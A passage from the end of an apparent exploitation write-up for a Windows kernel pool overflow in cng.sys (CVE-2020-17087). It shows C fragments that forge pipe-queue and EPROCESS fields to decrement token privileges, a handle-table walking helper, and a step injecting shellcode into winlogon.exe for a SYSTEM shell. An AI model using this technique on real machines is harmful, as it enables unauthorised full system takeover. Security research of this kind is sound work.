*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x08)=encode_ep(fake_eprocess + 0x1000, target_page_addr + 0xbe0 - 0x10);
*(UINT8 *) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) |= 0x8; // Set Quota bit
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x10)=0;	// Clear Irp buffer
*(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x20)=0;	// Unbuffered
*(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32636564;// Buf[]: "dec2"
*(UINT32 *)(ghost_pipes->payload+0x00)=0x32474747;		// Mark: "GGG2"

create_hole_at(ghost_pipes, ghost_idx);					// free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);					// rewrite ghost chunk

// perform 2nd decrement (-0x3E0) at Token + 0x48: 0x800000 - 0x3e0 = 0x7ffc20
create_hole_at(rewrite_pipes, aar_index);

Note that the DQE object has to be switched back to Unbuffered mode before it is freed.
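
The first step of find_write_queue, resolving a pipe handle to its FILE_OBJECT through the process handle table, is generic, and can be sketched under these assumptions: _EPROCESS.ObjectTable points to a _HANDLE_TABLE whose TableCode (at +0x8 on Windows 10 x64) carries the table level in its low 2 bits; handle entries are 16 bytes with 256 entries (0x400 handle values) per page; the object header address is recovered from the entry's first QWORD as ((LowValue >> 16) & ~0xF) | 0xFFFF000000000000; and the object body starts 0x30 bytes after the header. Only level 0 and level 1 tables are handled. The function names are hypothetical, and the NPFS-specific step from the FILE_OBJECT to the write queue is left out because its offsets are not covered here.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef uint64_t (*read64_fn)(uint64_t addr, void *ctx);

#define OBJECT_HEADER_SIZE 0x30   /* offset of _OBJECT_HEADER.Body on x64 */

/* Address of the _HANDLE_TABLE_ENTRY for handle, or 0 for unsupported levels. */
static uint64_t handle_entry_address(uint64_t table_code, uint64_t handle,
                                     read64_fn rd, void *ctx)
{
    uint64_t table = table_code & ~3ULL;
    switch (table_code & 3) {
    case 0:   /* one page of entries: index = handle / 4, 16 bytes per entry */
        return table + handle * 4;
    case 1:   /* page of pointers to entry pages, 0x400 handle values per page */
        return rd(table + (handle / 0x400) * 8, ctx) + (handle % 0x400) * 4;
    default:  /* 3-level tables are not handled in this sketch */
        return 0;
    }
}

/* Decode the object body address from the entry's first QWORD (LowValue). */
static uint64_t object_from_entry(uint64_t low_value)
{
    uint64_t header = ((low_value >> 16) & ~0xFULL) | 0xFFFF000000000000ULL;
    return header + OBJECT_HEADER_SIZE;
}

/* Buffer-backed reader for offline testing. */
typedef struct { const uint8_t *buf; uint64_t base; size_t size; } mem_view;

static uint64_t view_read64(uint64_t addr, void *ctx)
{
    const mem_view *v = (const mem_view *)ctx;
    uint64_t value = 0;
    if (addr >= v->base && addr - v->base + sizeof value <= v->size)
        memcpy(&value, v->buf + (addr - v->base), sizeof value);
    return value;
}
```

With several hundred pipe pairs open, handle values quickly exceed 0x400, which is why the level 1 case matters in practice.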

11. Spawn SYSTEM shell

Once we've obtained SeDebugPrivilege, we can then inject shellcode into winlogon.exe to spawn a SYSTEM shell.

References

  1. Mateusz Jurczyk (@j00ru) and Sergei Glazunov, Issue 2104: Windows Kernel cng.sys pool-based buffer overflow in IOCTL 0x390400

  2. Mateusz Jurczyk (@j00ru), CVE-2020-17087: Windows pool buffer overflow in cng.sys IOCTL

  3. Corentin Bayet (@OnlyTheDuck) and Paul Fariello (@paulfariello), Scoop the Windows 10 pool!, SSTIC 2020

  4. Angelboy (@scwuaptx), Lucifer challenge writeup, HITCON CTF 2020

  5. Angelboy (@scwuaptx), MichaelStorage challenge writeup, HITCON CTF 2020

  6. Angelboy (@scwuaptx), Windows Kernel Heap: Part 1: Segment Heap in Windows Kernel

  7. Mark Vincent Yason (@MarkYason), Windows 10 Segment Heap Internals, Black Hat USA 2016